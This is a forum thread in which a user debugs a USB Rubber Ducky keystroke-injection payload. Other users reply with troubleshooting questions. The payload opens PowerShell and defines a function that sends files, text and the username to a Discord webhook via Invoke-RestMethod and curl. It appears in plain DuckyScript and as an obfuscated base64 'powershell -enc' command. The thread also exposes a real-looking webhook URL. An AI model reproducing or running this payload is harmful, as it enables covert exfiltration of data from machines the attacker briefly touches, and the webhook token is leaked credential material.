Jason Boreno Posted January 10 Share Posted January 10 So im looking for guidance here. In my PowerShell script I use a function, it exports a file/ text to a discord webhook. When pasted into PowerShell, the function works fine. But when I convert it to a ducky script I get some errors that I don't get before. Here's the weird thing, when I encode the ducky script with base64, there's no spaces or formatting and it works fine. So I would assume its some type of formatting in my ducky script that is causing the error. When its encoded, I cannot reference other variables from outside the function so I need it to work in plain text. Anything helps. PS Script: function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'my discord webhook' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } Converted to ducky: DELAY 2000 GUI r DELAY 2000 STRING powershell DELAY 250 ENTER DELAY 2000 STRING function Upload-Discord { STRING STRING [CmdletBinding()] STRING param ( STRING [parameter(Position=0,Mandatory=$False)] STRING [string]$file, STRING [parameter(Position=1,Mandatory=$False)] STRING [string]$text STRING ) STRING STRING $hookurl = 'https://discord.com/api/webhooks/1194215544342196275/dgFll7XP-mLSiNWHxUoFkSpuKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI' STRING STRING $Body = @{ STRING 'username' = $env:username STRING 'content' = $text STRING } STRING STRING if (-not ([string]::IsNullOrEmpty($text))){ STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; STRING STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} STRING } STRING Converted to ducky (Encoded) works fine for some reason?: DELAY 2000 GUI r DELAY 2000 STRING powershell DELAY 250 ENTER DELAY 250 STRING powershell -enc ' DELAY 250 STRING ZgB1AG4AYwB0AGkAbwBuACAAVQBwAGwAbwBhAGQALQBEAGkAcwBjAG8AcgBkACAAewANAAoADQAKAFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoACkAXQANAAoAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIABbAHAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuAD0AMAAsAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABGAGEAbABzAGUAKQBdAA0ACgAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAkAGYAaQBsAGUALAANAAoAIAAgACAAIABbAHAAYQByAGEAbQBlAHQAZQByACgAUABvAHMAaQB0AGkAbwBuAD0AMQAsAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABGAGEAbABzAGUAKQBdAA0ACgAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAkAHQAZQB4AHQAIAANAAoAKQANAAoADQAKACQAaABvAG8AawB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBkAGkAcwBjAG8AcgBkAC4AYwBvAG0ALwBhAHAAaQAvAHcAZQBiAGgAbwBvAGsAcwAvADEAMQA5ADQAMgAxADUANQA0ADQAMwA0ADIAMQA5ADYAMgA3ADUALwBkAGcARgBsAGwANwBYAFAALQBtAEwAUwBpAE4AVwBIAHgAVQBvAEYAawBTAHAAdQBLAFQANgAyAFUAZgA1AEcATgAtAF8ASQBsAGMAdQBCADQAVgBrAG4AegBXAGsAeQA5AFUAdwBBAGwAUABvAFEAUgBlAHoAeAB6AEwAbwBJAFcAUgBKAEkAJwANAAoADQAKACQAQgBvAGQAeQAgAD0AIABAAHsADQAKACAAIAAnAHUAcwBlAHIAbgBhAG0AZQAnACAAPQAgACQAZQBuAHYAOgB1AHMAZQByAG4AYQBtAGUADQAKACAAIAAnAGMAbwBuAHQAZQBuAHQAJwAgAD0AIAAkAHQAZQB4AHQADQAKAH0ADQAKAA0ACgBpAGYAIAAoAC0AbgBvAHQAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoACQAdABlAHgAdAApACkAKQB7AA0ACgBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuAC8ASgBzAG8AbgAnACAALQBVAHIAaQAgACQAaABvAG8AawB1AHIAbAAgACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEIAbwBkAHkAIAAoACQAQgBvAGQAeQAgAHwAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AKQB9ADsADQAKAA0ACgBpAGYAIAAoAC0AbgBvAHQAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoACQAZgBpAGwAZQApACkAKQB7AGMAdQByAGwALgBlAHgAZQAgAC0ARgAgACIAZgBpAGwAZQAxAD0AQAAkAGYAaQBsAGUAIgAgACQAaABvAG8AawB1AHIAbAB9AA0ACgB9AA0ACgANAAoA' ENTER PS Errors: PS C:\WINDOWS\system32> function Upload-Discord {`n`n[CmdletBinding()]`nparam (`n[parameter(Position=0,Mandatory=$False)]`n[string]$file,`n[parameter(Position=1,Mandatory=$False)]`n[string]$text `n)`n`n$hookurl = 'https://discord.com/api/webhooks/1194215544342196275/dgFll7XP-mLSiNWHxUoFkSpuKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'`n`n$Body = @{`n'username' = $env:username`n'content' = $text`n}`n`nif (-not ([string]::IsNullOrEmpty($text))){`nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};`n`nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}`n}`nTRING At line:1 char:45 + function Upload-Discord {`n`n[CmdletBinding()]`nparam (`n[parameter(P ... + ~ An expression was expected after '('. At line:1 char:79 + ... scord {`n`n[CmdletBinding()]`nparam (`n[parameter(Position=0,Mandator ... + ~ Missing argument in parameter list. At line:1 char:137 + ... =0,Mandatory=$False)]`n[string]$file,`n[parameter(Position=1,Mandator ... + ~ Missing argument in parameter list. At line:1 char:327 + ... puKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'`n`n$Body = @{`n'usern ... + ~ The hash literal was incomplete. At line:1 char:621 + ... IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}`n}`nTRING + ~ Unexpected token '}' in expression or statement. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ExpectedExpression PS C:\WINDOWS\system32> Upload-Discord -file "$dir\output.txt" Upload-Discord : The term 'Upload-Discord' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 + Upload-Discord -file "$dir\output.txt" + ~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Upload-Discord:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException PS PIC: https://ibb.co/tXpxLmc Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted January 10 Share Posted January 10 4 hours ago, Jason Boreno said: when I encode the ducky script with base64 Just to be sure; as I see it, it's not the Ducky script that is encoded with base64, it's the PowerShell code/script. What are you using to encode the Ducky script itself into an inject.bin? Are you using a language when encoding that corresponds with the target keyboard language (if not US)? BTW, both your screenshot and the included base64 code is exposing a Discord webhook. If it's your webhook then that should perhaps be removed if you don't want to share it. Quote Link to comment Share on other sites More sharing options...
Jason Boreno Posted January 11 Author Share Posted January 11 20 hours ago, dark_pyrro said: Just to be sure; as I see it, it's not the Ducky script that is encoded with base64, it's the PowerShell code/script. What are you using to encode the Ducky script itself into an inject.bin? Are you using a language when encoding that corresponds with the target keyboard language (if not US)? BTW, both your screenshot and the included base64 code is exposing a Discord webhook. If it's your webhook then that should perhaps be removed if you don't want to share it. I used Jakobys PowerShell-to-ducky-converter to convert PowerShell functions to ducky, I've only seen it use the US keyboard (Target keyboard). This converter has the option for encoding, which I tried out, and did have success running it, though im unsure if the version I posted worked....But I did have success with it before. Here's the git for the converter if you are curious. ( https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter ) The main question I have though is, what exactly is throwing the error in the plane text ducky? Like I said before it works fine when pasted into PowerShell, but for some reason when the ducky script is typing it out, the formatting is off when compared to the PowerShell script and it never seems to work. Also, if I knew how to edit posts, I would take the discord hook out.... I was clearly not paying attention very well and was exited to find an active forum on the matter . I can always make a new one though! Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted January 11 Share Posted January 11 OK, I understand 2 hours ago, Jason Boreno said: I used Jakobys PowerShell-to-ducky-converter to convert PowerShell functions to ducky That, however, doesn't convert anything to DuckyScript as I see it. So my question remains; what tool are you using to encode the DuckyScript code to an inject.bin file that the Ducky can execute? 2 hours ago, Jason Boreno said: I've only seen it use the US keyboard (Target keyboard) That doesn't really answer my question about if the keyboard language used when encoding the DuckyScript payload is corresponding to the keyboard language used by the intended target. So, is the target Windows computer using a US keyboard layout? 2 hours ago, Jason Boreno said: what exactly is throwing the error in the plane text ducky? From what I can tell by looking at the output posted, it seems as if line feeds aren't handled correctly. That's why I'm asking about keyboard layouts. It doesn't really look like that might be the issue, but I have to ask to rule that out of it all. And my last question; are you using a true/original/official Hak5 USB Rubber Ducky (first generation) when doing all of this? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.